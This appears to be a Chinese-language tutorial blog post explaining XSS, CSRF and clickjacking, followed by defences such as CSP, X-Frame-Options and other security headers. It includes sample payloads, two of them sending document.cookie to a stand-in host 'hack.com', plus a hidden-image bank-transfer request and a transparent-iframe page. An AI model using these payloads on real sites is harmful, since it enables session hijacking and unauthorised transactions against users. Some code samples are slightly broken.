现在位置: 首页 / 计算机网络 / 正文

黑客是怎么偷走你账号的?

如何防范浏览器中的安全威胁:XSS、CSRF和点击劫持

浏览器安全概述

浏览器是用户访问互联网的主要工具,同时也是黑客攻击的重要目标。浏览器需要解析并执行任意来源的代码,处理用户的输入,并与服务器进行通信。这种特性使得浏览器容易受到各种类型的网络攻击,包括跨站脚本(XSS)、跨站请求伪造(CSRF)和点击劫持等。

主要威胁类型

XSS(跨站脚本攻击)

XSS 是一种常见的安全漏洞,黑客通过注入恶意代码到用户的浏览器中执行,从而获取敏感信息或控制用户会话。XSS 攻击可以分为存储型、反射型和 DOM 型三种类型:

存储型 XSS

最危险的 XXT 攻击,攻击者在服务器端存储恶意脚本,当其他用户访问时被执行。

实际例子:

<script>
  fetch('https://hack.com/steal?cookie=' + document.cookie);
</script>

<!-- 黑客将这段代码注入到评论区 -->

反射型 XSS

黑客通过 URL 参数传递恶意脚本,诱导用户访问后被执行。

实际例子:

app.get('/search', (req, res) => {
  const query = req.query.q;
  res.send(`
<h1>搜索结果:${query}</h1>`);

// 恶意 URL:
https://search.com/search?q=<script>alert('hacked')</script>

DOM 型 XSS

完全在客户端执行的攻击,服务器端不涉及任何代码注入。

实际例子:

const params = new URLSearchParams(window.location.search);
const search = params.get('q');
document.getElementById('result').innerHTML = '搜索结果: ' + search;
// 恶意 URL:
https://site.com?q=<img src=x onerror="fetch('https://hack.com/steal?cookie='+document.cookie)">

XSS 能做什么?

恶意行为包括获取用户的会话信息、窃取密码和其他敏感数据。

恶意行为说明
偷 Cookie获取 Session ID
键盘记录监听用户输入的密码
钓鱼弹窗伪造登录框获取密码
页面劫持修改页面内容或跳转

CSRF(跨站请求伪造)

CSRF 攻击利用用户的浏览器会话,发送未经授权的操作请求给服务器。

攻击流程:

  1. 用户登录银行网站并获取 Session Cookie。
  2. 恶意网站包含一个隐藏的 <img> 标签指向银行转账接口。
  3. 浏览器自动带上该用户的所有会话信息访问恶意链接。
  4. 银行服务器收到请求,执行转账操作。

实际例子:

<!DOCTYPE html>
<html>
<head><title>恭喜中奖!</title></head>
<body>

<h1>恭喜!您中了一等奖!</h1>
  <img src="https://bank.com/transfer?to=hacker&money=10000" style="display:none">
</body>
</html>

点击劫持攻击

点击劫持是一种隐蔽的攻击方式,通过 iframe 和透明层覆盖目标网站按钮,诱导用户在恶意页面上执行操作。

实际例子:

<!DOCTYPE html>
<html>
<head><title>免费领礼品</title></head>
<body>
  <button style="position:absolute; top:100px; left:50px; z-index:1;">
    免费领取iPhone!
  </button>

  <iframe src="https://bank.com/transfer"
          style="opacity:0; position:absolute; top:95px; left:45px; z-index:0;"></iframe>
</body>
</html>

CSP(内容安全策略)

CSP 是一种浏览器安全机制,通过 HTTP 响应头控制页面加载的资源来源。例如:

Content-Security-Policy: script-src 'self'; style-src 'self'

这表示只允许来自当前域名或指定域名的脚本和样式。

CSP 防止 XSS 示例

# 不允许内联脚本
Content-Security-Policy: script-src 'self'

<script>alert('xss')</script>

# 浏览器拒绝执行恶意代码

通过实施 CSP,可以有效防止各种类型的跨站脚本攻击。

安全 Headers

常用响应头及其作用

在现代Web开发中,使用安全响应头可以有效提高网站的安全性。以下是一些重要的头部设置及其功能:

  • Content-Security-Policy (CSP)

    • 功能:限制网页中加载的资源来源。
    • 示例:
      Content-Security-Policy: connect-src 'self' https://api.example.com

  • X-Frame-Options

    • 功能:防止网站被嵌入到其他网站的iframe中,避免点击劫持攻击。
    • 示例:
      X-Frame-Options: DENY

  • X-Content-Type-Options

    • 功能:禁止浏览器使用MIME类型嗅探功能来猜测和修改响应内容类型的显示方式。
    • 示例:
      X-Content-Type-Options: nosniff

  • Strict-Transport-Security (HSTS)

    • 功能:强制客户端通过HTTPS协议访问网站,减少中间人攻击的风险。
    • 示例:
      Strict-Transport-Security: max-age=31536000; includeSubDomains;

  • Referrer-Policy

    • 功能:控制浏览器在请求时发送的Referer头信息的内容,以保护用户隐私。
    • 示例:
      Referrer-Policy: no-referrer-when-downgrade

X-Frame-Options — 防止点击劫持

通过设置X-Frame-Options响应头可以有效防止网页被嵌入到其他网站的iframe中,从而避免点击劫持攻击。例如:

X-Frame-Options: DENY  # 完全禁止嵌套

或者用以下方式允许同域名下的页面嵌套:

X-Frame-Options: SAMEORIGIN

写在最后

现在,你应该对如何防范常见的浏览器安全威胁有了更深入的了解:

  • 跨站脚本攻击 (XSS):黑客通过注入恶意脚本来窃取用户数据。
  • CSRF(跨站请求伪造):利用用户的会话凭证执行非授权操作,例如转账等敏感行为。
  • 点击劫持:在透明或半透明的iframe背后放置一个恶意网站,并诱导用户进行不情愿的操作。

为了确保你的应用程序的安全性,以下几点是必须注意的:

  1. 对所有用户输入进行严格的验证;
  2. 使用CSP策略来限制资源加载来源;
  3. 保护敏感cookie使用HttpOnly和Samesite属性;
  4. 在表单提交中加入CSRF Token以防止伪造请求。

这样既可以确保合法用户的正常访问,又能最大程度地抵御黑客攻击。